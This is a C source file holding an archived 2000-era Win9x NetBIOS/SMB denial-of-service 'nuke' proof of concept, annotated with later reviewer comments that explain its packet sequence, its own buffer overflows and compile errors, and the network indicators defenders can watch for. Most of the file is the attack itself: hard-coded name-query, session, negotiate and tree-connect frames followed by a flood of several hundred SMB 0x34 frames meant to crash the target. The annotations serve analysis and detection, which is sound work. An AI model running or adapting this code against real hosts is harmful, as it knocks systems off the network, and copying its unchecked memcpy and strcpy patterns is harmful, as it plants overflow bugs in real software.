
  1. #include <windows.h>
  2. #include <winsock.h>
  3. #include <stdio.h>
  4. #include <string.h>
  5.  
  6.  
/*
 * Archived (2000-era) Win9x NetBIOS/SMB "nuke" proof of concept. The whole
 * program is this one main(); read it as a record of the traffic pattern it
 * generates rather than as maintainable code.
 *
 * What the visible code does, in order:
 *   1. Resolves <server> (argv[1]) and picks the TCP port (argv[2], default 139).
 *   2. Over UDP, sends a NetBIOS name-service query (buffgetname, record type
 *      0x21 = node status) to <server>:137 to learn the target's NetBIOS name.
 *   3. Over TCP, sends a NetBIOS session request (buff3, message type 0x81)
 *      carrying that name, and waits for a positive response (0x82).
 *   4. Sends an SMB negotiate (buff4, command 0x72) listing several dialects,
 *      refuses to continue if the response looks like user-level security.
 *   5. Sends one SMB command-0x73 frame naming \\<server>\IPC$ ("IPC"), then a
 *      burst of 0x2ff small SMB command-0x34 frames with file ids 0x600..0x8fe.
 *
 * Reviewer notes (defender's reading):
 *   - The tool is itself memory-unsafe: servername is an 11-byte array but is
 *     filled by memcpy(...,0x40) from network data and from gethostbyaddr();
 *     a hostile name-service reply or PTR record overflows this tool's stack.
 *   - It does not compile as written: the usage string literal is split across
 *     a line break, <stdlib.h> is never included (exit/atoi), and
 *     `server=&ipaddr` assigns a char(*)[12] to a char*.
 *   - Almost no socket return value is checked (socket, setsockopt, bind,
 *     sendto, send, recv); recvfrom is passed a bogus address length.
 *   - Network-side indicators of this tool are a UDP node-status query from
 *     source port 500, followed on TCP/139 by one session request, one
 *     negotiate, one 0x73 frame and then several hundred 41-byte frames with
 *     command byte 0x34 and a sequentially increasing file id.
 *
 * @param argc  argument count; fewer than 2 prints usage and exits.
 * @param argv  argv[1] = target host or dotted IP, argv[2] = optional TCP port.
 * @return 0 after the burst (or after a failed connect); other failures exit(1).
 */
int main(int argc, char **argv)
{
char *server;
char buff[1000];   /* outgoing SMB frames (only the first 400 bytes are zeroed) */
char buff2[1000];  /* incoming data (UDP: 500 bytes max, TCP: 600 bytes max)   */
/* NetBIOS name-service query, 0x32 bytes: txid 0x0072, flags 0x0010, 1 question,
 * 32-byte encoded wildcard name ("CKAAAA...A"), type 0x0021, class 0x0001. */
char buffgetname[]=
{0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
0x00,0x01};
char name;                       /* scratch byte; `char` signedness matters for the >>4 below */
char myname[0x200]={"hello"};    /* unused */
/* NOTE(review): 11 bytes ("*SMBSERVER" + NUL) but written with 0x40-byte memcpy
 * further down -- stack overflow inside this tool, not in the target. */
char servername[]={"*SMBSERVER"};
/* NetBIOS session request, 0x48 bytes: type 0x81, length 0x44, called name at
 * [5..36], calling name at [39..70]; both are rewritten from servername below. */
char buff3[]=
{0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,0x43,0x48,0x46,0x44,0x43,0x41,
0x46,0x48,0x45,0x50,0x46,0x43,0x45,0x4d,0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,
0x43,0x41,0x43,0x41,00,0x20,0x45,0x48,0x46,0x46,0x45,0x46,0x46,0x44,0x46,0x45,
0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
0x43,0x41,0x43,0x41,0x41,0x41,00
};
/* SMB negotiate request, 0x9e bytes: 4-byte NBSS header (length 0x9a), then
 * "\xffSMB" + command 0x72, then the dialect list: "PC NETWORK PROGRAM 1.0",
 * "MICROSOFT NETWORKS 3.0", "DOS LM1.2X002", "DOS LANMAN2.1",
 * "Windows for Workgroups 3.1a", "NT LM 0.12". */
char buff4[]={
0x0,0x0,0x0,0x9a,0xff,0x53,0x4d,0x42,0x72,00,00, 00, 00, 00, 00, 00, 00, 00,
00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 ,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x77,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x20,0x50,
0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x00,0x02,0x4d,0x49,0x43,0x52,
0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x33,
0x2e,0x30,0x00,0x02,0x44,0x4f,0x53,0x20,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,
0x32,0x00,0x02,0x44,0x4f,0x53,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,
0x00,0x02,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,
0x72,0x6b,0x67,0x72,0x6f,0x75,0x70,0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4e,
0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0
};
int fileid_begin=0x600;   /* range of file ids swept by the final 0x34 loop (end exclusive) */
int fileid_end=0x8ff;
char smbchr[]={"SMBr"};            /* expected at offset 5 of the negotiate response */
char namereturn[]={0x82,0,0,0,0};  /* NetBIOS positive session response header */
char ipaddr[]={"192.168.1.1"};     /* only reached through a dead branch (argc<2 exits first) */
char ipaddrbak[]={"127.0.0.1"};    /* unused */

int port,gethost;
int fd,fd2;                        /* fd: TCP to <server>:port, fd2: UDP for the name query */

struct sockaddr_in s_in,s_in2,s_in3;   /* s_in: TCP target, s_in2: local UDP bind, s_in3: UDP target */
struct linger time_out;                /* unused */
struct hostent *he;
int i,j,k;
SOCKET d_ip;                           /* misused as a 32-bit IPv4 address holder */
WSADATA wsaData;
int result= WSAStartup(MAKEWORD(1, 1), &wsaData);   /* requests Winsock 1.1 */
if (result != 0) {
        fprintf(stderr, "Your computer was not connected "
            "to the Internet at the time that "
            "this program was launched, or you "
            "do not have a 32-bit "
            "connection to the Internet.");
        exit(1);
    }


if(argc <2)
{
WSACleanup( );
    /* NOTE(review): this literal spans a physical line break -> not valid C as archived. */
    fprintf(stderr,"\n nuke win9x netbios .\n copy by yuange(yuange@nsfocus.com) 2000.4.1. \n
                       wellcome to our homepage http://www.nsfocus.com .");
    fprintf(stderr, "\n usage: %s <server> [port] \n", argv[0]);
exit(1);
}
if(argc>=2)
server = argv[1];
else server=&ipaddr;   /* unreachable (argc<2 exited above); also a char(*)[12] -> char* type mismatch */
d_ip = inet_addr(server);

if(d_ip==-1){          /* not a dotted quad (INADDR_NONE): fall back to DNS */
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
    printf("\n Can't get the ip of %s !\n",server);
exit(1);
    }
    else memcpy(&d_ip, he->h_addr, 4);   /* first A record, already network byte order */

}
if(argc>2) port = atoi(argv[2]);   /* atoi: no error reporting, 0 on garbage; <stdlib.h> not included */
else port=139;

fd = socket(AF_INET, SOCK_STREAM,0);   /* return value unchecked */
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,&i,sizeof(i));   /* Winsock: receive timeout in ms */

s_in.sin_family = AF_INET;
s_in.sin_port = htons(port);
s_in.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port %d",inet_ntoa(s_in.sin_addr),htons(s_in.sin_port));

if(!connect(fd, (struct sockaddr *)&s_in, sizeof(struct sockaddr_in))){

/* --- step 2: UDP node-status query to learn the target's NetBIOS name --- */
fd2 = socket(AF_INET, SOCK_DGRAM,0);
    i=8000;
    setsockopt(fd2,SOL_SOCKET,SO_RCVTIMEO,&i,sizeof(i));

s_in2.sin_family = AF_INET;
s_in2.sin_port = htons(500);   /* fixed local source port; bind() result is not checked */
s_in2.sin_addr.s_addr =0;

    s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(137);   /* NetBIOS name service on the target */
s_in3.sin_addr.s_addr = d_ip;
    bind(fd2,&s_in2, sizeof(struct sockaddr_in));
/* Up to 10 attempts; k is forced to 100 below once a positive session
 * response arrives, which both exits this loop and is re-checked after it. */
for(k=0;k<10;++k){
        printf("\n connect the smb %d times",k+1);
sendto(fd2,buffgetname,0x32,0,&s_in3,sizeof(struct sockaddr_in));
        i= sizeof(struct sockaddr_in);   /* immediately clobbered by the zeroing loop below */

        for(i=0;i<520;++i) buff2[i]=0;
    /* NOTE(review): &i is the fromlen argument, but i is 520 here, not sizeof(s_in3). */
    j=recvfrom(fd2,buff2,500,0,&s_in3,&i);
        /* Walk the 18-byte name entries starting at offset 0x39 of the reply and take the
         * first one whose type byte (+0x0f) is 0x20.  The copy is 0x40 bytes into an
         * 11-byte array, and buff2[i+0x0f] may be read past the j bytes received. */
        i=0x39;
        while(i<j){
            if(buff2[i+0x0f]==0x20) {
                memcpy(servername,buff2+i,0x40);
                break;
            }
            i+=0x12;
        }

        if(i>=j){   /* no usable name entry: fall back to a reverse DNS lookup (same 0x40-byte overflow) */
        he=gethostbyaddr(&d_ip,sizeof(d_ip),PF_INET);
    if(he) memcpy(servername,he->h_name,0x40);
        }
        printf("\n server computername: %s",servername);

    /* --- step 3: encode servername into both name fields of the session request.
     * Each byte becomes two letters ('A' + high nibble, 'A' + low nibble); once the
     * NUL is seen the rest is padded with 0x20 (space). --- */
    gethost=0;
    for(i=0;i<16;++i){
        name=servername[i] ;
        if(name==0) gethost=1;
        if(gethost==1) name=0x20;
        buff3[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
        buff3[2*i+6]= (name & 0x000F) + 'A';
        }
    buff3[37]=0;
    gethost=0;
    for(i=0;i<16;++i){
            name=servername[i];
            if(name==0) gethost=1;
        if(gethost==1) name=0x20;
        buff3[2*i+39]= ( (name >> 4) & 0x000F ) + 'A';
        buff3[2*i+40]= (name & 0x000F) + 'A';

        }
    buff3[71]=0;

    i=send(fd,buff3,0x48,0);
    printf("\n send name packet %d bytes",i);
    buff2[0]=0;
    buff2[1]=0;
    buff2[2]=0;
    buff2[3]=0;
    buff2[4]=0;
    i=recv(fd,buff2,600,0);
    printf("\n recv :");
    if(i>0){
            for(j=0;j<i;++j) {
                name=(char * )buff2[j];   /* int -> pointer -> char round trip; just dumps each byte as a number */
                printf("%d ",name);
            }
        }
        if(memcmp(buff2,namereturn,4)==0) k=100;   /* positive session response: stop retrying */
    }

    closesocket(fd2);
    if(k<100){
    printf("\n Can't Negative! \n");
closesocket(fd);
    WSACleanup( );
exit(1);
    }
    /* --- step 4: SMB negotiate (command 0x72); these stores repeat the values
     * already in the buff4 initializer. --- */
    buff4[0]=0;
    buff4[1]=0;
    buff4[2]=0;
    buff4[3]=0x9a;
    buff4[4]=0xff;
    buff4[5]='S';
    buff4[6]='M';
    buff4[7]='B';
    buff4[8]=0x72;
    buff4[0x25]=0x77;
    j=send(fd,buff4,0x9e,0);
        printf("\n send smb 0x72 packet %d bytes",j);


        buff2[4]=0;
        buff2[5]=0;
        buff2[6]=0;
        j=recv(fd,buff2,600,0);
        printf("\n recv packet %d bytes:\n",j);
        /* strcmp (not memcmp) here relies on the byte after "SMBr" being 0 in the reply. */
        if(strcmp(buff2+5,smbchr)!=0){
            printf("\n Can't login \\\\%s\\ipc$! \n",inet_ntoa(s_in.sin_addr));
        closesocket(fd);
        WSACleanup( );
        exit(1);
        }
        /* Bit 0 of byte 0x27 of the reply -- presumably the SecurityMode byte (user-level
         * security) of the negotiate response; the author treats it as "this is NT". */
        name=buff2[0x27];
        name&=0x01;
        if(name==1){
        printf("\n Only can nuke win9x system,can't nuke winnt system.\n");
        closesocket(fd);
        WSACleanup( );
        exit(1);
        }

        printf("\nBegin smb packet nuke !");

/* --- step 5a: one SMB command-0x73 frame.  Only the first 400 bytes of buff are
 * cleared; the NBSS length byte at [3] and the string length at [0x93] are stored
 * into a char, so they wrap for long names.  The ASCII at 0x4e..0x55 and 0x59..0x5d
 * spells "ISTRATOR" and "ADMIN"; the path \\<servername>\IPC$ and service "IPC"
 * are appended at 0x96 onward with unbounded strcpy. --- */
for(i=0;i<400;++i) buff[i]=0;
    buff[0]=0;
    buff[1]=0;
    buff[2]=0;
    buff[3]=0x9e+strlen(servername);
    buff[4]=0xff;
    buff[5]='S';
    buff[6]='M';
    buff[7]='B';
    buff[8]=0x73;
    buff[0x24]=0x0d;
    buff[0x25]=0x75;
    buff[0x27]=0x86;
    buff[0x29]=0x68;
    buff[0x2a]=0x0b;
    buff[0x2b]=0x32;
    buff[0x33]=0x18;
    buff[0x3b]=0x05;
    buff[0x3f]=0x49;
    buff[0x59]=0x41;
    buff[0x5a]=0x44;
    buff[0x5b]=0x4d;
    buff[0x5c]=0x49;
    buff[0x5d]=0x4e;
    buff[0x4e]=0x49;
    buff[0x4f]=0x53;
    buff[0x50]=0x54;
    buff[0x51]=0x52;
    buff[0x52]=0x41;
    buff[0x53]=0x54;
    buff[0x54]=0x4f;
    buff[0x55]=0x52;

    buff[0x8a]=0x04;
    buff[0x8b]=0xff;
    buff[0x8f]=0x02;
    buff[0x91]=1;

    buff[0x93]=13+strlen(servername);
    buff[0x96]=0x5c;
    buff[0x97]=0x5c;

        strcpy(buff+0x98,servername);
        strcpy(buff+0x98+strlen(servername),"\\IPC$");
        strcpy(buff+0x9e+strlen(servername),"IPC");

        j=send(fd,buff,0xa2+strlen(servername),0);
        printf("\n send smb 0x73 packet %d bytes",j);

        j=recv(fd,buff2,600,0);   /* reply is received but never inspected */
        printf("\n recv packet %d bytes",j);


/* --- step 5b: the actual flood.  0x2ff frames of 0x29 bytes, command 0x34, word
 * count 1, with the 16-bit file id at [0x25..0x26] stepping from 0x600 to 0x8fe.
 * No reply is ever read; send() errors are only printed. --- */
    for(i=0;i<400;++i) buff[i]=0;
        buff[0]=0;
    buff[1]=0;
    buff[2]=0;
    buff[3]=0x25;
    buff[4]=0xff;
    buff[5]='S';
    buff[6]='M';
    buff[7]='B';
    buff[8]=0x34;
    buff[0x24]=0x01;
    for(i=fileid_begin;i<fileid_end;++i){
        buff[0x25]=i%0x100;   /* little-endian file id */
        buff[0x26]=i/0x100;
        j=send(fd,buff,0x29,0);
        printf("\n send smb 0x34 packet long %d",j);
            printf(" FileId: %d",i);
        }
}
else printf("\n connect err !\n");

closesocket(fd);
WSACleanup( );
return(0);
}
  299.  
  300.  
  301.